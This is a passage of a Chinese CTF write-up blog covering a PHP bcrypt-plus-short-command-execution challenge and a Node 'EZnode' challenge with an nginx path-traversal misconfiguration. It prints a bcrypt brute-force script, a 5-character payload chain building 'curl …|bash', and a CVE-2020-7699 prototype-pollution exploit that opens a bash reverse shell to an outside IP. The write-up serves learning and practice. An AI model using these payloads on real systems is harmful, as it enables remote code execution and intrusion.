<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> 😁😁<span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="keyword">global</span> $🏁,$strlen,$chr,$base64_decode,$isset;</span><br><span class="line">	$path = <span class="string">"/var/www/html/sandbox/"</span>.md5($_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line">	mkdir($path);</span><br><span class="line">	chdir($path);</span><br><span class="line">	<span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'cmd'</span>]) &amp;&amp; strlen($_GET[<span class="string">'cmd'</span>]) &lt;= <span class="number">5</span>) &#123;</span><br><span class="line">		@exec($_GET[<span class="string">'cmd'</span>]);</span><br><span class="line">		<span class="comment">//</span></span><br><span class="line">	&#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'reset'</span>])) &#123;</span><br><span class="line">		@exec(<span class="string">"rm -rf"</span> . $path);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">$🎯 = <span class="keyword">new</span> Bcrypt();</span><br><span class="line"></span><br><span class="line">$🔑 = $_POST[<span class="string">"passwd"</span>];</span><br><span class="line">$🔒 = <span class="string">"$2y$10$RBfi8QpJJQQmJD6FylurJeqmP.6cMn7tdoKczL2v9hScd9zDj3wXe"</span>;</span><br><span class="line"><span class="keyword">if</span>($🎯-&gt;verify($passwd, $lock)) &#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"Password verified!"</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"Wow!!Now,hack it!"</span>;</span><br><span class="line">	😁😁();</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;Password not match!&lt;/br&gt;"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后发现有composer包，安装，然后查资料bcrypt</p>
<h3 id="bcrypt"><a href="#bcrypt" class="headerlink" title="bcrypt"></a>bcrypt</h3><p><code>bcrypt</code>是一种哈希算法，可以通过硬件进行扩展（通过可配置的循环次数）。</p>
<p><strong><code>bcrypt</code>是一种单向哈希算法。</strong>如果不知道盐，圆<strong>和密码</strong>（密码），则无法检索纯文本密码。</p>
<blockquote>
<p>加盐：</p>
<p>就是人为的通过一组随机字符与用户原密码的组合形成一个新的字符，从而增加破译的难度。</p>
</blockquote>
<p>在php中，主要有内置的函数<code>password_hash</code>和<code>password_verify</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$a = password_hash(<span class="string">'password'</span>,PASSWORD_DEFAULT);</span><br><span class="line"><span class="keyword">echo</span> $a.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line"><span class="keyword">if</span>(password_verify(<span class="string">'password'</span>,$a))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"success"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"failed"</span>;</span><br><span class="line">&#125;</span><br><span class="line">var_dump(password_get_info($a));</span><br><span class="line"></span><br><span class="line"><span class="comment">#输出信息</span></span><br><span class="line"><span class="keyword">array</span> (size=<span class="number">3</span>)</span><br><span class="line">  <span class="string">'algo'</span> =&gt; int <span class="number">1</span></span><br><span class="line">  <span class="string">'algoName'</span> =&gt; string <span class="string">'bcrypt'</span> (length=<span class="number">6</span>)</span><br><span class="line">  <span class="string">'options'</span> =&gt; </span><br><span class="line">    <span class="keyword">array</span> (size=<span class="number">1</span>)</span><br><span class="line">      <span class="string">'cost'</span> =&gt; int <span class="number">10</span></span><br><span class="line">$a = password_hash(<span class="string">'password'</span>,PASSWORD_DEFAULT,<span class="keyword">array</span>(<span class="string">'cost'</span> =&gt; <span class="number">11</span>));</span><br><span class="line"><span class="comment">//相应的cost也会变为11；</span></span><br></pre></td></tr></table></figure>
<p>接下来就是爆破，已知密码为bcrypt+4位小写字母</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">require</span> <span class="string">'vendor/autoload.php'</span>; </span><br><span class="line"><span class="keyword">use</span> <span class="title">Bcrypt</span>\<span class="title">Bcrypt</span>; </span><br><span class="line">$key = <span class="string">"abcdefghijklmnopqrstuvwxyz"</span>; </span><br><span class="line">$bcrypt = <span class="keyword">new</span> Bcrypt(); </span><br><span class="line">$plaintext = <span class="string">'bcrypt'</span>;<span class="comment">//bcryptyyds </span></span><br><span class="line">$ciphertext = <span class="string">'$2y$10$RBfi8QpJJQQmJD6FylurJeqmP.6cMn7tdoKczL2v9hScd9zDj3wXe'</span>; </span><br><span class="line"><span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;<span class="number">26</span>;$i++) &#123; </span><br><span class="line">    <span class="keyword">for</span>($j=<span class="number">0</span>;$j&lt;<span class="number">26</span>;$j++) &#123; </span><br><span class="line">        <span class="keyword">for</span>($k=<span class="number">0</span>;$k&lt;<span class="number">26</span>;$k++) &#123; </span><br><span class="line">            <span class="keyword">for</span>($m=<span class="number">0</span>;$m&lt;<span class="number">26</span>;$m++) &#123; </span><br><span class="line">                <span class="keyword">echo</span> $plaintext.$str.PHP_EOL; </span><br><span class="line">                $str = $key[$i].$key[$j].$key[$k].$key[$m]; </span><br><span class="line">                <span class="keyword">if</span>($bcrypt-&gt;verify($plaintext.$str, $ciphertext))&#123; </span><br><span class="line">                    <span class="keyword">echo</span>(<span class="string">"&lt;/br&gt;Password verified!&lt;/br&gt;"</span>); </span><br><span class="line">                    <span class="keyword">echo</span>(<span class="string">"Wow!!Now,hack it!&lt;/br&gt;"</span>); </span><br><span class="line">                &#125; </span><br><span class="line">            &#125; </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><p>最终的考点就是命令执行可以参考hitcon-ctf-2017</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> 😁😁<span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="keyword">global</span> $🏁,$strlen,$chr,$base64_decode,$isset;</span><br><span class="line">	$path = <span class="string">"/var/www/html/sandbox/"</span>.md5($_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line">	mkdir($path);</span><br><span class="line">	chdir($path);</span><br><span class="line">	<span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'cmd'</span>]) &amp;&amp; strlen($_GET[<span class="string">'cmd'</span>]) &lt;= <span class="number">5</span>) &#123;</span><br><span class="line">		@exec($_GET[<span class="string">'cmd'</span>]);</span><br><span class="line">		<span class="comment">//</span></span><br><span class="line">	&#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'reset'</span>])) &#123;</span><br><span class="line">		@exec(<span class="string">"rm -rf"</span> . $path);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这道题大概意思就是存在命令执行，但单次输入字符不得大于5。因此利用linux下特有的命令来写入shell反弹。原理就是利用curl ip|bash等很多方式去反弹shell。顺便也复习了反弹shell的一些基本操作</p>
<p>官方的脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line">url = <span class="string">"http://219.219.61.234:10048/?cmd="</span></span><br><span class="line">payload = [</span><br><span class="line">    <span class="comment"># generate "g&gt; ht- sl" to file "v"</span></span><br><span class="line">    <span class="string">'&gt;dir'</span>,</span><br><span class="line">    <span class="string">'&gt;sl'</span>,</span><br><span class="line">    <span class="string">'&gt;g\&gt;'</span>,</span><br><span class="line">    <span class="string">'&gt;ht-'</span>,</span><br><span class="line">    <span class="string">'*&gt;v'</span>,</span><br><span class="line">    <span class="comment"># reverse file "v" to file "x", content "ls -th &gt;g" '</span></span><br><span class="line">    <span class="string">'&gt;rev'</span>,</span><br><span class="line">    <span class="string">'*v&gt;x'</span>,</span><br><span class="line">    <span class="comment"># generate "curl 0X2761697D|bash"</span></span><br><span class="line">    <span class="string">'&gt;sh '</span>,</span><br><span class="line">    <span class="string">'&gt;ba\\'</span>,</span><br><span class="line">    <span class="string">'&gt;\|\\'</span>,</span><br><span class="line">    <span class="string">'&gt;\\'</span>,</span><br><span class="line">    <span class="string">'&gt;7D\\'</span>,</span><br><span class="line">    <span class="string">'&gt;69\\'</span>,</span><br><span class="line">    <span class="string">'&gt;61\\'</span>,</span><br><span class="line">    <span class="string">'&gt;27\\'</span>,</span><br><span class="line">    <span class="string">'&gt;0X\\'</span>,</span><br><span class="line">    <span class="string">'&gt;\ \\'</span>,</span><br><span class="line">    <span class="string">'&gt;rl\\'</span>,</span><br><span class="line">    <span class="string">'&gt;cu\\'</span>,</span><br><span class="line">    <span class="comment"># got shell</span></span><br><span class="line">    <span class="string">'sh x'</span>,</span><br><span class="line">    <span class="string">'sh g'</span>,</span><br><span class="line">]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> payload:</span><br><span class="line">    <span class="keyword">assert</span> len(i) &lt;= <span class="number">5</span></span><br><span class="line">    data = &#123; <span class="string">'passwd'</span>:<span class="string">'bcryptyyds'</span>, &#125;</span><br><span class="line">    header = &#123; <span class="string">"Content-Type"</span> : <span class="string">"application/x-www-form-urlencoded"</span>,</span><br><span class="line">               <span class="string">"Accept"</span> : <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,ima ge/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"</span>,</span><br><span class="line">               <span class="string">"Upgrade-Insecure-Requests"</span> : <span class="string">"1"</span> &#125;</span><br><span class="line">    r = requests.post(url + urllib.quote(i),data=data,headers=header)</span><br><span class="line">    print(i)</span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br></pre></td></tr></table></figure>
<p>这个很郁闷，配置环境很长时间还是没能弄出来</p>
<h2 id="EZnode"><a href="#EZnode" class="headerlink" title="EZnode"></a>EZnode</h2><p>应该是国赛分区赛的题</p>
<h3 id="考点-3"><a href="#考点-3" class="headerlink" title="考点"></a>考点</h3><p>nginx反向代理配置错误</p>
<p>首先来学习一下ngnix</p>
<h3 id="ngnix"><a href="#ngnix" class="headerlink" title="ngnix"></a>ngnix</h3><p>ngnix是一款自由的、开源的、高性能的HTTP服务器和反向代理服务器。</p>
<p>主要在三个方面</p>
<ul>
<li>反向代理</li>
<li>负载均衡</li>
<li>nginx特点</li>
</ul>
<p><strong>反向代理</strong></p>
<blockquote>
<p>先说正向代理</p>
<p>客户端非常明确要访问的服务器地址；服务器只清楚请求来自哪个代理服务器，而不清楚来自哪个具体的客户端；正向代理模式屏蔽或者隐藏了真实客户端信息。</p>
</blockquote>
<p><img src="/2020/09/28/%E5%A4%8D%E7%8E%B0wp/image-20201004160128766.png" alt="image-20201004160128766"></p>
<p>上面这个图就很形象了</p>
<p>多个客户端给服务器发送的请求，nginx服务器接收到之后，</p>
<p>按照一定的规则分发给了后端的业务处理服务器进行处理了。</p>
<p>此时~请求的来源也就是客户端是明确的，但是请求具体由哪台服务器处理的并不明确了，nginx扮演的就是一个反向代理角色</p>
<p><strong>负载均衡</strong></p>
<p>在反向代理中</p>
<p>客户端会向服务端发出请求，而服务器将接受到的请求按照规则分发的过程，就叫做负载均衡</p>
<p><strong>ngnix配置</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">main                                # 全局配置</span><br><span class="line"> </span><br><span class="line">events &#123;                            # nginx工作模式配置</span><br><span class="line"> </span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">http &#123;                                # http设置</span><br><span class="line">    ....</span><br><span class="line"> </span><br><span class="line">    server &#123;                        # 服务器主机配置</span><br><span class="line">        ....</span><br><span class="line">        location &#123;                    # 路由配置</span><br><span class="line">            ....</span><br><span class="line">        &#125;</span><br><span class="line"> </span><br><span class="line">        location path &#123;</span><br><span class="line">            ....</span><br><span class="line">        &#125;</span><br><span class="line"> </span><br><span class="line">        location otherpath &#123;</span><br><span class="line">            ....</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    server &#123;</span><br><span class="line">        ....</span><br><span class="line"> </span><br><span class="line">        location &#123;</span><br><span class="line">            ....</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    upstream name &#123;                    # 负载均衡配置</span><br><span class="line">        ....</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>发现有目录穿越漏洞参考</p>
<p><a href="https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html</a></p>
<p>/static../</p>
<p><img src="/2020/09/28/%E5%A4%8D%E7%8E%B0wp/image-20201004162700298.png" alt="image-20201004162700298"></p>
<p>之后就是找cve了，比较菜，只能学习</p>
<p>cve-2020-7699</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">cmd = <span class="string">'bash -c "bash -i &amp;&gt; /dev/tcp/39.97.105.125/8080 0&gt;&amp;1"'</span></span><br><span class="line"><span class="comment"># pollute</span></span><br><span class="line">r1 = requests.post(<span class="string">'http://219.219.61.234:20006/y0u_CaNn07_Gu3ss_tHe_pATh'</span>, files = &#123;<span class="string">'__proto__.outputFunctionName'</span>: (</span><br><span class="line">    <span class="literal">None</span>, <span class="string">"x;process.mainModule.require('child_process').exec('&#123;&#125;');x"</span>.format(cmd))&#125;)</span><br><span class="line">print(r1.text)</span><br><span class="line"><span class="comment"># execute command</span></span><br><span class="line">r2 = requests.get(<span class="string">'http://219.219.61.234:20006/'</span>)</span><br><span class="line">print(r2.text)</span><br></pre></td></tr></table></figure>
<p>之后反弹shell，执行命令。</p>

      </div>
      <div class="post-copyright">
    <p class="copyright-item">
      <span>Author: </span>
      <a href="https://pz1o.top">M1key</a>
    </p>
    <p class="copyright-item">
      <span>Link: </span>
      <a href="https://pz1o.top/2020/09/28/%E5%A4%8D%E7%8E%B0wp/">https://pz1o.top/2020/09/28/%E5%A4%8D%E7%8E%B0wp/</a>
    </p>
    <p class="copyright-item">
      <span>License: </span><a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank">知识共享署名-非商业性使用 4.0 国际许可协议</a>
    </p>
  </div>
      <footer class="post-footer">
        <div class="post-tags">
            <a href="/tags/WP/">WP</a>
            </div>
        
        <nav class="post-nav"><a class="prev" href="/2020/10/03/%E5%8F%8D%E5%BC%B9shell%E6%80%BB%E7%BB%93/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">反弹shell总结</span>
        <span class="prev-text nav-mobile">Prev</span>
      </a>
    <a class="next" href="/2020/09/27/BUU%E5%88%B7%E9%A2%98/">
        <span class="next-text nav-default">BUU(Web)</span>
        <span class="prev-text nav-mobile">Next</span>
        <i class="iconfont icon-right"></i>
      </a>
    </nav></footer>
    </article></div><div class="comments" id="comments"></div></div>
      </main>

      <footer id="footer" class="footer"><div class="social-links"><a href="mailto:pz1olzy@aliyun.com" class="iconfont icon-email" title="email"></a>
        <a href="https://stackoverflow.com" target="_blank" rel="noopener" class="iconfont icon-stack-overflow" title="stack-overflow"></a>
        <a href="https://twitter.com" target="_blank" rel="noopener" class="iconfont icon-twitter" title="twitter"></a>
        <a href="https://google.com" target="_blank" rel="noopener" class="iconfont icon-google" title="google"></a>
        <a href="https://github.com/pz1o" target="_blank" rel="noopener" class="iconfont icon-github" title="github"></a>
        <a href="https://zhihu.com" target="_blank" rel="noopener" class="iconfont icon-zhihu" title="zhihu"></a>
        <a href="https://douban.com" target="_blank" rel="noopener" class="iconfont icon-douban" title="douban"></a>
        <a href="/atom.xml" class="iconfont icon-rss" title="rss"></a>
    </div><div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - 
    <a class="theme-link" href="https://github.com/ahonn/hexo-theme-even" target="_blank" rel="noopener">Even</a>
  </span>

  <span class="copyright-year">&copy;2020 - 2021<span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">M1key</span>
  </span>
</div>
</footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div><script type="text/javascript" src="/lib/jquery/jquery.min.js"></script>
  <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  <script type="text/javascript" src="/js/src/even.js?v=2.11.0"></script>
</body>
</html>
